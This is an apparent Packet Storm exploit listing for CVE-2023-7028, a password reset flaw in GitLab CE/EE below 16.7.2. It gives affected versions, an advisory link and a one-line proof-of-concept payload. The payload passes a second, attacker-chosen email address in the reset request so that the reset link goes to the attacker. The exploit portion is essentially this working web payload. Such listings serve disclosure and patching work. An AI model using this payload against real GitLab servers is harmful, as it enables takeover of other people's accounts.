Lucene search

K
packetstormSebastian KriestenPACKETSTORM:177587
HistoryMar 14, 2024 - 12:00 a.m.

GitLab CE/EE Password Reset

2024-03-1400:00:00
Sebastian Kriesten
packetstormsecurity.com
152
password reset
gitlab ce/ee
vulnerability disclosure
cve-2023-7028
proof of concept

7.4 High

AI Score

Confidence

Low

0.96 High

EPSS

Percentile

99.5%

`# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset  
# Exploit Author: Sebastian Kriesten (0xB455)  
# Twitter: https://twitter.com/0xB455  
  
# Date: 2024-01-12  
# Vendor Homepage: gitlab.com  
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/  
# Version: <16.7.2, <16.6.4, <16.5.6  
# CVE: CVE-2023-7028  
  
Proof of Concept:  
user[email][][email protected]&user[email][][email protected]  
  
  
`